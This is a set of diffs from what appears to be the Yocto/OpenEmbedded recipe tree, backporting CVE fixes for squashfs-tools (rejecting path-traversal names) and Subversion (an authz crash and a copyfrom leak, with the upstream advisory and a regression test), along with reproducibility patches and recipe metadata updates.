38diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile
39index aee4b960..20feaca2 100644
40--- a/squashfs-tools/Makefile
41+++ b/squashfs-tools/Makefile
42@@ -156,7 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o action.o swap.o pseudo.o compressor.o \
43 caches-queues-lists.o
44
45 UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \
46- unsquash-4.o unsquash-123.o unsquash-34.o swap.o compressor.o unsquashfs_info.o
47+ unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \
48+ compressor.o unsquashfs_info.o
49
50 CFLAGS ?= -O2
51 CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \
52@@ -350,6 +351,8 @@ unsquash-123.o: unsquashfs.h unsquash-123.c squashfs_fs.h squashfs_compat.h
53
54 unsquash-34.o: unsquashfs.h unsquash-34.c
55
56+unsquash-1234.o: unsquash-1234.c
57+
58 unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h
59
60 unsquashfs_info.o: unsquashfs.h squashfs_fs.h
61diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c
62index 34eced36..28326cb1 100644
63--- a/squashfs-tools/unsquash-1.c
64+++ b/squashfs-tools/unsquash-1.c
65@@ -2,7 +2,7 @@
66 * Unsquash a squashfs filesystem. This is a highly compressed read only
67 * filesystem.
68 *
69- * Copyright (c) 2009, 2010, 2011, 2012, 2019
70+ * Copyright (c) 2009, 2010, 2011, 2012, 2019, 2021
71 * Phillip Lougher <phillip@squashfs.org.uk>
72 *
73 * This program is free software; you can redistribute it and/or
74@@ -285,6 +285,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
75 memcpy(dire->name, directory_table + bytes,
76 dire->size + 1);
77 dire->name[dire->size + 1] = '\0';
78+
79+ /* check name for invalid characters (i.e /, ., ..) */
80+ if(check_name(dire->name, dire->size + 1) == FALSE) {
81+ ERROR("File system corrupted: invalid characters in name\n");
82+ goto corrupted;
83+ }
84+
85 TRACE("squashfs_opendir: directory entry %s, inode "
86 "%d:%d, type %d\n", dire->name,
87 dirh.start_block, dire->offset, dire->type);
88diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
89new file mode 100644
90index 00000000..c2d4f42b
91--- /dev/null
92+++ b/squashfs-tools/unsquash-1234.c
93@@ -0,0 +1,58 @@
94+/*
95+ * Unsquash a squashfs filesystem. This is a highly compressed read only
96+ * filesystem.
97+ *
98+ * Copyright (c) 2021
99+ * Phillip Lougher <phillip@squashfs.org.uk>
100+ *
101+ * This program is free software; you can redistribute it and/or
102+ * modify it under the terms of the GNU General Public License
103+ * as published by the Free Software Foundation; either version 2,
104+ * or (at your option) any later version.
105+ *
106+ * This program is distributed in the hope that it will be useful,
107+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
108+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
109+ * GNU General Public License for more details.
110+ *
111+ * You should have received a copy of the GNU General Public License
112+ * along with this program; if not, write to the Free Software
113+ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
114+ *
115+ * unsquash-1234.c
116+ *
117+ * Helper functions used by unsquash-1, unsquash-2, unsquash-3 and
118+ * unsquash-4.
119+ */
120+
121+#define TRUE 1
122+#define FALSE 0
123+/*
124+ * Check name for validity, name should not
125+ * - be ".", "./", or
126+ * - be "..", "../" or
127+ * - have a "/" anywhere in the name, or
128+ * - be shorter than the expected size
129+ */
130+int check_name(char *name, int size)
131+{
132+ char *start = name;
133+
134+ if(name[0] == '.') {
135+ if(name[1] == '.')
136+ name++;
137+ if(name[1] == '/' || name[1] == '\0')
138+ return FALSE;
139+ }
140+
141+ while(name[0] != '/' && name[0] != '\0')
142+ name ++;
143+
144+ if(name[0] == '/')
145+ return FALSE;
146+
147+ if((name - start) != size)
148+ return FALSE;
149+
150+ return TRUE;
151+}
152diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
153index 4b3d767e..474064e1 100644
154--- a/squashfs-tools/unsquash-2.c
155+++ b/squashfs-tools/unsquash-2.c
156@@ -2,7 +2,7 @@
157 * Unsquash a squashfs filesystem. This is a highly compressed read only
158 * filesystem.
159 *
160- * Copyright (c) 2009, 2010, 2013, 2019
161+ * Copyright (c) 2009, 2010, 2013, 2019, 2021
162 * Phillip Lougher <phillip@squashfs.org.uk>
163 *
164 * This program is free software; you can redistribute it and/or
165@@ -386,6 +386,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
166 memcpy(dire->name, directory_table + bytes,
167 dire->size + 1);
168 dire->name[dire->size + 1] = '\0';
169+
170+ /* check name for invalid characters (i.e /, ., ..) */
171+ if(check_name(dire->name, dire->size + 1) == FALSE) {
172+ ERROR("File system corrupted: invalid characters in name\n");
173+ goto corrupted;
174+ }
175+
176 TRACE("squashfs_opendir: directory entry %s, inode "
177 "%d:%d, type %d\n", dire->name,
178 dirh.start_block, dire->offset, dire->type);
179diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c
180index 02c31fc5..65cfe4d9 100644
181--- a/squashfs-tools/unsquash-3.c
182+++ b/squashfs-tools/unsquash-3.c
183@@ -2,7 +2,7 @@
184 * Unsquash a squashfs filesystem. This is a highly compressed read only
185 * filesystem.
186 *
187- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
188+ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
189 * Phillip Lougher <phillip@squashfs.org.uk>
190 *
191 * This program is free software; you can redistribute it and/or
192@@ -413,6 +413,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
193 memcpy(dire->name, directory_table + bytes,
194 dire->size + 1);
195 dire->name[dire->size + 1] = '\0';
196+
197+ /* check name for invalid characters (i.e /, ., ..) */
198+ if(check_name(dire->name, dire->size + 1) == FALSE) {
199+ ERROR("File system corrupted: invalid characters in name\n");
200+ goto corrupted;
201+ }
202+
203 TRACE("squashfs_opendir: directory entry %s, inode "
204 "%d:%d, type %d\n", dire->name,
205 dirh.start_block, dire->offset, dire->type);
206diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
207index 8475835c..aa23a841 100644
208--- a/squashfs-tools/unsquash-4.c
209+++ b/squashfs-tools/unsquash-4.c
210@@ -2,7 +2,7 @@
211 * Unsquash a squashfs filesystem. This is a highly compressed read only
212 * filesystem.
213 *
214- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
215+ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
216 * Phillip Lougher <phillip@squashfs.org.uk>
217 *
218 * This program is free software; you can redistribute it and/or
219@@ -349,6 +349,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
220 memcpy(dire->name, directory_table + bytes,
221 dire->size + 1);
222 dire->name[dire->size + 1] = '\0';
223+
224+ /* check name for invalid characters (i.e /, ., ..) */
225+ if(check_name(dire->name, dire->size + 1) == FALSE) {
226+ ERROR("File system corrupted: invalid characters in name\n");
227+ goto corrupted;
228+ }
229+
230 TRACE("squashfs_opendir: directory entry %s, inode "
231 "%d:%d, type %d\n", dire->name,
232 dirh.start_block, dire->offset, dire->type);
233diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
234index 934618b2..db1da7a0 100644
235--- a/squashfs-tools/unsquashfs.h
236+++ b/squashfs-tools/unsquashfs.h
237@@ -4,7 +4,7 @@
238 * Unsquash a squashfs filesystem. This is a highly compressed read only
239 * filesystem.
240 *
241- * Copyright (c) 2009, 2010, 2013, 2014, 2019
242+ * Copyright (c) 2009, 2010, 2013, 2014, 2019, 2021
243 * Phillip Lougher <phillip@squashfs.org.uk>
244 *
245 * This program is free software; you can redistribute it and/or
246@@ -261,4 +261,7 @@ extern int read_ids(int, long long, long long, unsigned int **);
247
248 /* unsquash-34.c */
249 extern long long *alloc_index_table(int);
250+
251+/* unsquash-1234.c */
252+extern int check_name(char *, int);
253 #endif
diff --git a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
index b06951df36..5d754b20b3 100644
--- a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
+++ b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
@@ -1,14 +1,17 @@
1# Note, we can probably remove the lzma option as it has be replaced with xz, 1# Note, we can probably remove the lzma option as it has be replaced with xz,
2# and I don't think the kernel supports it any more. 2# and I don't think the kernel supports it any more.
3SUMMARY = "Tools for manipulating SquashFS filesystems" 3SUMMARY = "Tools for manipulating SquashFS filesystems"
4HOMEPAGE = "https://github.com/plougher/squashfs-tools"
5DESCRIPTION = "Tools to create and extract Squashfs filesystems."
4SECTION = "base" 6SECTION = "base"
5LICENSE = "GPL-2" 7LICENSE = "GPL-2"
6LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" 8LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
7 9
8PV = "4.4" 10PV = "4.4"
9SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67" 11SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67"
10SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https \ 12SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https;branch=master \
11 file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \ 13 file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \
14 file://CVE-2021-40153.patch;striplevel=2 \
12" 15"
13 16
14S = "${WORKDIR}/git/squashfs-tools" 17S = "${WORKDIR}/git/squashfs-tools"
diff --git a/meta/recipes-devtools/strace/strace_5.5.bb b/meta/recipes-devtools/strace/strace_5.5.bb
index ae552da028..4121cfcce7 100644
--- a/meta/recipes-devtools/strace/strace_5.5.bb
+++ b/meta/recipes-devtools/strace/strace_5.5.bb
@@ -1,5 +1,6 @@
1SUMMARY = "System call tracing tool" 1SUMMARY = "System call tracing tool"
2HOMEPAGE = "http://strace.io" 2HOMEPAGE = "http://strace.io"
3DESCRIPTION = "strace is a diagnostic, debugging and instructional userspace utility for Linux. It is used to monitor and tamper with interactions between processes and the Linux kernel, which include system calls, signal deliveries, and changes of process state."
3SECTION = "console/utils" 4SECTION = "console/utils"
4LICENSE = "LGPL-2.1+ & GPL-2+" 5LICENSE = "LGPL-2.1+ & GPL-2+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=c756d9d5dabc27663df64f0bf492166c" 6LIC_FILES_CHKSUM = "file://COPYING;md5=c756d9d5dabc27663df64f0bf492166c"
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
new file mode 100644
index 0000000000..5bebde2a86
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
@@ -0,0 +1,117 @@
1Upstream-Status: Backport [ https://subversion.apache.org/security/CVE-2020-17525-advisory.txt ]
2CVE: CVE-2020-17525
3Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
4
5 Remote unauthenticated denial-of-service in Subversion mod_authz_svn.
6
7Summary:
8========
9
10 Subversion's mod_authz_svn module will crash if the server is using
11 in-repository authz rules with the AuthzSVNReposRelativeAccessFile
12 option and a client sends a request for a non-existing repository URL.
13
14 This can lead to disruption for users of the service.
15
16Known vulnerable:
17=================
18
19 mod_dav_svn+mod_authz_svn servers 1.9.0 through 1.10.6 (inclusive).
20 mod_dav_svn+mod_authz_svn servers 1.11.0 through 1.14.0 (inclusive).
21
22Known fixed:
23============
24
25 mod_dav_svn+mod_authz_svn servers 1.14.1
26 mod_dav_svn+mod_authz_svn servers 1.10.7
27
28Details:
29========
30
31 A null-pointer-dereference has been found in mod_authz_svn that results in
32 a remote unauthenticated Denial-of-Service in some server configurations.
33
34 The vulnerability can be triggered by an unauthenticated user if the
35 Apache HTTPD server is configured to use an in-repository authz file,
36 with configuration directives such as:
37
38 AuthzSVNAccessFile "^/authz"
39 AuthzSVNReposRelativeAccessFile "^/authz"
40
41 The problem originates when sending a GET request to a non-existent
42 repository. The mod_authz_svn module will attempt to find authz rules
43 at a path within the requested SVN repository. Upon constructing this
44 path, the function svn_repos_find_root_path will return a NULL pointer
45 since the requested repository does not exist on-disk.
46 A check for this legitimate NULL pointer condition is missing, which
47 results in a segmentation fault when the NULL pointer is used.
48
49 The in-repository authz feature was first introduced in Subversion 1.8:
50 https://subversion.apache.org/docs/release-notes/1.8.html#in-repo-authz
51
52 The missing NULL check was first introduced during refactoring of the
53 authz code during development work leading up to Subversion 1.9.
54 Subversion 1.8 servers are unaffected.
55
56Severity:
57=========
58
59 CVSSv3 Base Score: 7.5 (High)
60
61 CVSSv3 Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
62
63 Exploitation results in denial of service by crashing the HTTPD worker
64 handling the request. The impact of this differs depending on how the
65 Apache HTTPD server is configured, including the choice of MPM (Multi-
66 Processing-Module). If the worker shares its memory address space with
67 the main thread, as is the case with e.g. the Event MPM, the entire
68 HTTPD server process will terminate. If the pre-fork MPM is used, the
69 worker will terminate but the HTTPD server will stay up, and service
70 availability will depend on how frequently the attacker is able to
71 send malicious requests which target the vulnerability.
72
73Recommendations:
74================
75
76 We recommend all users to upgrade to a known fixed release of the
77 Subversion mod_dav_svn server.
78
79 Users who are unable to upgrade may apply the included patches.
80
81 As a workaround, the use of in-repository authz rules files with
82 the AuthzSVNReposRelativeAccessFile can be avoided by switching
83 to an alternative configuration which fetches an authz rules file
84 from the server's filesystem, rather than from an SVN repository.
85
86References:
87===========
88
89 CVE-2020-17525 (Subversion)
90
91Reported by:
92============
93
94 Thomas Åkesson, simonsoft.se
95
96Patches:
97========
98
99 Patch for Subversion 1.10, 1.14:
100
101[[[
102Index: subversion/libsvn_repos/config_file.c
103===================================================================
104--- a/subversion/libsvn_repos/config_file.c (revision 1883994)
105+++ b/subversion/libsvn_repos/config_file.c (working copy)
106@@ -237,6 +237,10 @@ get_repos_config(svn_stream_t **stream,
107 {
108 /* Search for a repository in the full path. */
109 repos_root_dirent = svn_repos_find_root_path(dirent, scratch_pool);
110+ if (repos_root_dirent == NULL)
111+ return svn_error_trace(handle_missing_file(stream, checksum, access,
112+ url, must_exist,
113+ svn_node_none));
114
115 /* Attempt to open a repository at repos_root_dirent. */
116 SVN_ERR(svn_repos_open3(&access->repos, repos_root_dirent, NULL,
117]]]
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
new file mode 100644
index 0000000000..030ead6c66
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
@@ -0,0 +1,146 @@
1From 61382fd8ea66000bd9ee8e203a6eab443220ee40 Mon Sep 17 00:00:00 2001
2From: Nathan Hartman <hartmannathan@apache.org>
3Date: Sun, 27 Mar 2022 05:59:18 +0000
4Subject: [PATCH] On the 1.14.x-r1899227 branch: Merge r1899227 from trunk
5 w/testlist variation
6
7git-svn-id: https://svn.apache.org/repos/asf/subversion/branches/1.14.x-r1899227@1899229 13f79535-47bb-0310-9956-ffa450edef68
8
9CVE: CVE-2021-28544 [https://github.com/apache/subversion/commit/61382fd8ea66000bd9ee8e203a6eab443220ee40]
10Upstream-Status: Backport
11Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
12---
13 subversion/libsvn_repos/log.c | 26 +++++-------
14 subversion/tests/cmdline/authz_tests.py | 55 +++++++++++++++++++++++++
15 2 files changed, 65 insertions(+), 16 deletions(-)
16
17diff --git a/subversion/libsvn_repos/log.c b/subversion/libsvn_repos/log.c
18index d9a1fb1085e16..41ca8aed27174 100644
19--- a/subversion/libsvn_repos/log.c
20+++ b/subversion/libsvn_repos/log.c
21@@ -337,42 +337,36 @@ detect_changed(svn_repos_revision_access_level_t *access_level,
22 if ( (change->change_kind == svn_fs_path_change_add)
23 || (change->change_kind == svn_fs_path_change_replace))
24 {
25- const char *copyfrom_path = change->copyfrom_path;
26- svn_revnum_t copyfrom_rev = change->copyfrom_rev;
27-
28 /* the following is a potentially expensive operation since on FSFS
29 we will follow the DAG from ROOT to PATH and that requires
30 actually reading the directories along the way. */
31 if (!change->copyfrom_known)
32 {
33- SVN_ERR(svn_fs_copied_from(&copyfrom_rev, &copyfrom_path,
34+ SVN_ERR(svn_fs_copied_from(&change->copyfrom_rev, &change->copyfrom_path,
35 root, path, iterpool));
36 change->copyfrom_known = TRUE;
37 }
38
39- if (copyfrom_path && SVN_IS_VALID_REVNUM(copyfrom_rev))
40+ if (change->copyfrom_path && SVN_IS_VALID_REVNUM(change->copyfrom_rev))
41 {
42- svn_boolean_t readable = TRUE;
43-
44 if (callbacks->authz_read_func)
45 {
46 svn_fs_root_t *copyfrom_root;
47+ svn_boolean_t readable;
48
49 SVN_ERR(svn_fs_revision_root(&copyfrom_root, fs,
50- copyfrom_rev, iterpool));
51+ change->copyfrom_rev, iterpool));
52 SVN_ERR(callbacks->authz_read_func(&readable,
53 copyfrom_root,
54- copyfrom_path,
55+ change->copyfrom_path,
56 callbacks->authz_read_baton,
57 iterpool));
58 if (! readable)
59- found_unreadable = TRUE;
60- }
61-
62- if (readable)
63- {
64- change->copyfrom_path = copyfrom_path;
65- change->copyfrom_rev = copyfrom_rev;
66+ {
67+ found_unreadable = TRUE;
68+ change->copyfrom_path = NULL;
69+ change->copyfrom_rev = SVN_INVALID_REVNUM;
70+ }
71 }
72 }
73 }
74diff --git a/subversion/tests/cmdline/authz_tests.py b/subversion/tests/cmdline/authz_tests.py
75index 760cb3663d02f..92e8a5e1935c9 100755
76--- a/subversion/tests/cmdline/authz_tests.py
77+++ b/subversion/tests/cmdline/authz_tests.py
78@@ -1731,6 +1731,60 @@ def empty_group(sbox):
79 '--username', svntest.main.wc_author,
80 sbox.repo_url)
81
82+@Skip(svntest.main.is_ra_type_file)
83+def log_inaccessible_copyfrom(sbox):
84+ "log doesn't leak inaccessible copyfrom paths"
85+
86+ sbox.build(empty=True)
87+ sbox.simple_add_text('secret', 'private')
88+ sbox.simple_commit(message='log message for r1')
89+ sbox.simple_copy('private', 'public')
90+ sbox.simple_commit(message='log message for r2')
91+
92+ svntest.actions.enable_revprop_changes(sbox.repo_dir)
93+ # Remove svn:date and svn:author for predictable output.
94+ svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
95+ '-r2', 'svn:date', sbox.repo_url)
96+ svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
97+ '-r2', 'svn:author', sbox.repo_url)
98+
99+ write_restrictive_svnserve_conf(sbox.repo_dir)
100+
101+ # First test with blanket access.
102+ write_authz_file(sbox,
103+ {"/" : "* = rw"})
104+ expected_output = svntest.verify.ExpectedOutput([
105+ "------------------------------------------------------------------------\n",
106+ "r2 | (no author) | (no date) | 1 line\n",
107+ "Changed paths:\n",
108+ " A /public (from /private:1)\n",
109+ "\n",
110+ "log message for r2\n",
111+ "------------------------------------------------------------------------\n",
112+ ])
113+ svntest.actions.run_and_verify_svn(expected_output, [],
114+ 'log', '-r2', '-v',
115+ sbox.repo_url)
116+
117+ # Now test with an inaccessible copy source (/private).
118+ write_authz_file(sbox,
119+ {"/" : "* = rw"},
120+ {"/private" : "* ="})
121+ expected_output = svntest.verify.ExpectedOutput([
122+ "------------------------------------------------------------------------\n",
123+ "r2 | (no author) | (no date) | 1 line\n",
124+ "Changed paths:\n",
125+ # The copy is shown as a plain add with no copyfrom info.
126+ " A /public\n",
127+ "\n",
128+ # No log message, as the revision is only partially visible.
129+ "\n",
130+ "------------------------------------------------------------------------\n",
131+ ])
132+ svntest.actions.run_and_verify_svn(expected_output, [],
133+ 'log', '-r2', '-v',
134+ sbox.repo_url)
135+
136
137 ########################################################################
138 # Run the tests
139@@ -1771,6 +1825,7 @@ def empty_group(sbox):
140 inverted_group_membership,
141 group_member_empty_string,
142 empty_group,
143+ log_inaccessible_copyfrom,
144 ]
145 serial_only = True
146
diff --git a/meta/recipes-devtools/subversion/subversion_1.13.0.bb b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
index b3c44ca9b9..5643191569 100644
--- a/meta/recipes-devtools/subversion/subversion_1.13.0.bb
+++ b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Subversion (svn) version control system client" 1SUMMARY = "Subversion (svn) version control system client"
2HOMEPAGE = "http://subversion.apache.org" 2HOMEPAGE = "http://subversion.apache.org"
3DESCRIPTION = "Subversion is an open source version control system."
3SECTION = "console/network" 4SECTION = "console/network"
4LICENSE = "Apache-2 & MIT" 5LICENSE = "Apache-2 & MIT"
5LIC_FILES_CHKSUM = "file://LICENSE;md5=6487ae7094d359fa90fb9c4096e52e2b" 6LIC_FILES_CHKSUM = "file://LICENSE;md5=6487ae7094d359fa90fb9c4096e52e2b"
@@ -11,6 +12,8 @@ SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
11 file://disable_macos.patch \ 12 file://disable_macos.patch \
12 file://0001-Fix-libtool-name-in-configure.ac.patch \ 13 file://0001-Fix-libtool-name-in-configure.ac.patch \
13 file://serfmacro.patch \ 14 file://serfmacro.patch \
15 file://CVE-2020-17525.patch \
16 file://CVE-2021-28544.patch \
14 " 17 "
15 18
16SRC_URI[md5sum] = "3004b4dae18bf45a0b6ea4ef8820064d" 19SRC_URI[md5sum] = "3004b4dae18bf45a0b6ea4ef8820064d"
diff --git a/meta/recipes-devtools/swig/swig/determinism.patch b/meta/recipes-devtools/swig/swig/determinism.patch
new file mode 100644
index 0000000000..8ffb4bce8e
--- /dev/null
+++ b/meta/recipes-devtools/swig/swig/determinism.patch
@@ -0,0 +1,19 @@
1Remove the compiler commandline/platform from the compiled binary as this
2breaks reproducibilty.
3
4Upstream-Status: Inappropriate [OE reproducibiity fix upstream unlikely to take]
5RP 2021/3/1
6
7
8Index: swig-3.0.12/Source/Modules/main.cxx
9===================================================================
10--- swig-3.0.12.orig/Source/Modules/main.cxx
11+++ swig-3.0.12/Source/Modules/main.cxx
12@@ -636,7 +636,6 @@ void SWIG_getoptions(int argc, char *arg
13 }
14 } else if (strcmp(argv[i], "-version") == 0) {
15 fprintf(stdout, "\nSWIG Version %s\n", Swig_package_version());
16- fprintf(stdout, "\nCompiled with %s [%s]\n", SWIG_CXX, SWIG_PLATFORM);
17 fprintf(stdout, "\nConfigured options: %cpcre\n",
18 #ifdef HAVE_PCRE
19 '+'
diff --git a/meta/recipes-devtools/swig/swig_3.0.12.bb b/meta/recipes-devtools/swig/swig_3.0.12.bb
index 45026c9700..090aaa8112 100644
--- a/meta/recipes-devtools/swig/swig_3.0.12.bb
+++ b/meta/recipes-devtools/swig/swig_3.0.12.bb
@@ -6,6 +6,7 @@ SRC_URI += "file://0001-Use-proc-self-exe-for-swig-swiglib-on-non-Win32-plat.pat
6 file://swig-3.0.12-Coverity-fix-issue-reported-for-SWIG_Python_FixMetho.patch \ 6 file://swig-3.0.12-Coverity-fix-issue-reported-for-SWIG_Python_FixMetho.patch \
7 file://Python-Fix-new-GCC8-warnings-in-generated-code.patch \ 7 file://Python-Fix-new-GCC8-warnings-in-generated-code.patch \
8 file://0001-Fix-generated-code-for-constant-expressions-containi.patch \ 8 file://0001-Fix-generated-code-for-constant-expressions-containi.patch \
9 file://determinism.patch \
9 " 10 "
10SRC_URI[md5sum] = "82133dfa7bba75ff9ad98a7046be687c" 11SRC_URI[md5sum] = "82133dfa7bba75ff9ad98a7046be687c"
11SRC_URI[sha256sum] = "7cf9f447ae7ed1c51722efc45e7f14418d15d7a1e143ac9f09a668999f4fc94d" 12SRC_URI[sha256sum] = "7cf9f447ae7ed1c51722efc45e7f14418d15d7a1e143ac9f09a668999f4fc94d"
diff --git a/meta/recipes-devtools/syslinux/syslinux/determinism.patch b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
new file mode 100644
index 0000000000..2fb8c64df3
--- /dev/null
+++ b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
@@ -0,0 +1,22 @@
1In order to build deterministic binaries, we need to sort the wildcard expansion
2so the libraries are linked in the same order each time. This fixes reproducibility
3issues within syslinux builds.
4
5Upstream-Status: Pending
6RP 2021/3/1
7
8Index: syslinux-6.04-pre2/mk/lib.mk
9===================================================================
10--- syslinux-6.04-pre2.orig/mk/lib.mk
11+++ syslinux-6.04-pre2/mk/lib.mk
12@@ -130,8 +130,8 @@ LIBENTRY_OBJS = \
13 exit.o
14
15 LIBGCC_OBJS = \
16- $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c)) \
17- $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S))
18+ $(sort $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c))) \
19+ $(sort $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S)))
20
21 LIBCONSOLE_OBJS = \
22 \
diff --git a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
index 3e7eef3a75..a5618327bf 100644
--- a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
+++ b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Multi-purpose linux bootloader" 1SUMMARY = "Multi-purpose linux bootloader"
2HOMEPAGE = "http://www.syslinux.org/" 2HOMEPAGE = "http://www.syslinux.org/"
3DESCRIPTION = "The Syslinux Project covers lightweight bootloaders for MS-DOS FAT filesystems (SYSLINUX), network booting (PXELINUX), bootable "El Torito" CD-ROMs (ISOLINUX), and Linux ext2/ext3/ext4 or btrfs filesystems (EXTLINUX). The project also includes MEMDISK, a tool to boot legacy operating systems (such as DOS) from nontraditional media; it is usually used in conjunction with PXELINUX and ISOLINUX."
3LICENSE = "GPLv2+" 4LICENSE = "GPLv2+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \ 5LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
5 file://README;beginline=35;endline=41;md5=558f2c71cb1fb9ba511ccd4858e48e8a" 6 file://README;beginline=35;endline=41;md5=558f2c71cb1fb9ba511ccd4858e48e8a"
@@ -22,11 +23,16 @@ SRC_URI = "https://www.zytor.com/pub/syslinux/Testing/6.04/syslinux-${PV}.tar.xz
22 file://0009-linux-syslinux-implement-install_bootblock.patch \ 23 file://0009-linux-syslinux-implement-install_bootblock.patch \
23 file://0010-Workaround-multiple-definition-of-symbol-errors.patch \ 24 file://0010-Workaround-multiple-definition-of-symbol-errors.patch \
24 file://0001-install-don-t-install-obsolete-file-com32.ld.patch \ 25 file://0001-install-don-t-install-obsolete-file-com32.ld.patch \
26 file://determinism.patch \
25 " 27 "
26 28
27SRC_URI[md5sum] = "2b31c78f087f99179feb357da312d7ec" 29SRC_URI[md5sum] = "2b31c78f087f99179feb357da312d7ec"
28SRC_URI[sha256sum] = "4441a5d593f85bb6e8d578cf6653fb4ec30f9e8f4a2315a3d8f2d0a8b3fadf94" 30SRC_URI[sha256sum] = "4441a5d593f85bb6e8d578cf6653fb4ec30f9e8f4a2315a3d8f2d0a8b3fadf94"
29 31
32# remove at next version upgrade or when output changes
33PR = "r1"
34HASHEQUIV_HASH_VERSION .= ".1"
35
30UPSTREAM_CHECK_URI = "https://www.zytor.com/pub/syslinux/" 36UPSTREAM_CHECK_URI = "https://www.zytor.com/pub/syslinux/"
31UPSTREAM_CHECK_REGEX = "syslinux-(?P<pver>.+)\.tar" 37UPSTREAM_CHECK_REGEX = "syslinux-(?P<pver>.+)\.tar"
32UPSTREAM_VERSION_UNKNOWN = "1" 38UPSTREAM_VERSION_UNKNOWN = "1"
diff --git a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
index a7a1f0ff1a..e1233ffde0 100644
--- a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
+++ b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
@@ -1,8 +1,14 @@
1SUMMARY = "Boot performance graphing tool"
2DESCRIPTION = "For systemd-bootchart, several proc debug interfaces are required in the kernel config: \
3 CONFIG_SCHEDSTATS \
4below is optional, for additional info: \
5 CONFIG_SCHED_DEBUG"
6HOMEPAGE = "https://github.com/systemd/systemd-bootchart"
1LICENSE = "LGPLv2.1 & GPLv2" 7LICENSE = "LGPLv2.1 & GPLv2"
2LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \ 8LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \
3 file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe" 9 file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe"
4 10
5SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https \ 11SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https;branch=master \
